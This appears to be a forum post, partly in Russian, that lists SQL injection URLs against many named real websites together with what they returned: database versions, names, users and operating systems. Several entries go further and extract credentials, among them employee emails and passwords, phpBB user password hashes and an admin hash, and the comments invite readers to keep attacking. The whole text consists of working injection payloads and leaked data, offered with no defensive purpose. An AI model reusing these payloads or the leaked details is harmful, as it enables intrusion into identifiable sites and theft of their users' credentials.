view-source: http://www.infotronica.ro/produs.php?id=-P:229-S:41+UNION+SELECT+1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+limit+1,1 http://www.infotronica.ro/produs.php?id=-P:229-S:41+UNION+SELECT+1,2,CONCAT((SELECT+CONCAT_WS(0x3a,Email,Parola,Nume)+FROM+tronica_infotr.angajati+LIMIT+0,1)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+limit+1,1 Database Version: 5.0.81-community-log Database name: tronica_infotr User name: tronica_hogast@localhost Os: unknown-linux-gnu
User: [email protected] Database: mrgrim8888 Version: 4.1.22-max-log User: [email protected] Database: content Version: 5.0.67-userstats-log
http://www.latodis-med.com/produs.php?id=74+UNION+SELECT+1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13+LIMIT+1,1-- Database Version: 5.0.82-msl-usrs-sure2-log Database name: latodis_latodis User name: veterinare@localhost Os: unknown-linux-gnu
User: abstinence@localhost Database: abstinencedb Version: 4.1.22 User: [email protected] Database: autozap Version: 5.0.24a-community-nt
Сайт какойто авиакомпании http://www.ctaholidays.net/beta/holiday_details.php?id=1225586740+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user(),database(),version()),9,10,11,12,13,14,15-- sercanak_main@localhost:sercanak_ctav2:5.0.81-community-log Далее попал случайно http://www.ctaholidays.net/beta/holiday_details.php?id=1225586740+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.tables+limit+21,100-- Table 'sercanak_ctav2.holiday_to_insurance' doesn't existUnknown column '_users' in 'where clause' Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home1/sercanak/public_html/ctaholidays/beta/classes/connection.cls.php on line 53 Дальше крутите сами
http://www.hlhclub.ru/state.php?id=-45+union+select+1,2,concat_ws(0x3a,user(),database(),version(),@@version_compile_os),4-- [email protected]:wwwhlhclubru:4.1.25-logortbld-freebsd6.4
http://www.discusmedia.com/catalog.php?id=24751+and+1=0+ Union Select 1,2,3,4,concat_ws(0x3a,user(),database (),version(),@@version_compile_os),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 [email protected]hotoeu:5.0.75c-linux-gnu
5.0.87:food1@localhost:foodlink 4.1.25-log:wwwanthostnet:anthost@localhost 5.0.77:www_new_catalog:nmarroot@localhost 5.0.77:samarainfo_root@localhost:samara_info Таблица: dev_admin1t
http://www.komdiv.ru/viewnews.php?id=-9+union+select+1,2,3,4,group_concat(0x0b,column_name),6+from+information_schema.columns+where+table_name=0x70687062625f666f72756d7573657273-- MySQL 5.1.36-log http://www.komdiv.ru/viewnews.php?id=-9+union+select+1,2,3,4,group_concat(0x0b,username,0x3a,user_password),6+from+phpbb_forumusers--
Code: http://www.skylink39.ru/catalog.php?id=64+union+select+1,2,3,concat_ws(0x203B20,user(),database(),version()),5,6,7,8,9,10,11,12,13+--+ User: [email protected] Database: skylink2_db Version: 4.1.22-log
http://www.endchildpoverty.org.uk/news.php?id=-23+union+select+1,2,3,version(),5,6,7,8,9-- 5.0.44 Code: http://www.herpconstrust.org.uk/news/expand-news.php?id=-85+union+select+1,2,3,4,user(),6,7,8-- 4.1.19-standard-log
http://vintage-avenue.com/details.php?id=-102+union+select+1,concat_ws(0x3a,version(),database(),useR(),@@version_compile_os),3,4,5,6,7,8,9,10-- Database Version: 4.1.22-log Database name: whvintagexpresscom User name: [email protected] Os: redhat-linux-gnu
http://www.granitstore.ro/detalii-produs.php?id=-97+UNION+SELECT+1,2,3,4,concat_ws(0x3a,version(),database(),useR(),@@version_compile_os),6,7,8,9,10,11,12,13,14,15-- http://www.granitstore.ro/detalii-produs.php?id=-97+UNION+SELECT+1,2,3,4,concat_ws(0x3a,utilizator,parola),6,7,8,9,10,11,12,13,14,15+from+admin+limit+1,1-- admin:e0ee1d48f2a4697296e3e30d47cb2c админка есть по класическому адресу, но хеш очень интересный так как гуру брутеры и хешкрякеры не смогли опознать его Database Version: 5.0.51a-3ubuntu5.4 Database name: granit_store User name: granitstore@localhost Os: debian-linux-gnu
Федеральная власть в Татарстане Code: federal16:federal16@localhost:4.0.20-log Всемирная организация "Объединенные города и местные власти" Евроазиатское Региональное Отделение Code: b53750_russian:[email protected]:5.0.85 Дизайн-студия "Амигос" - логотипы, фирменный стиль, создание сайтов, полиграфия, веб дизайн, регистрация доменов. Казань Code: samigos_samigos:samigos_samigos@localhost:4.1.22-standard
тиц 120 Code: http://www.[COLOR=Green]studycanada.ru[/COLOR]/cgi-bin/issue.cgi?action=showforum&cat_id=18&fid=3/**/union/**/select/**/1,concat_ws(char(58,58),user(),database(),version()),3,4,5,6,7/* main1@localhost::canada::4.1.20
http://www.yamaha-hifi.de/index.php?lang=e&country=DE&idcat1=1&idcat2=2+union+select+1,concat_Ws(0x3a,user(),database(),version()),3,4-- web5@localhost:usr_web5_1:4.0.15-Max http://www.eicta.org/index.php?id=32&id_article=50+and+substring(version(),1,1)=5--
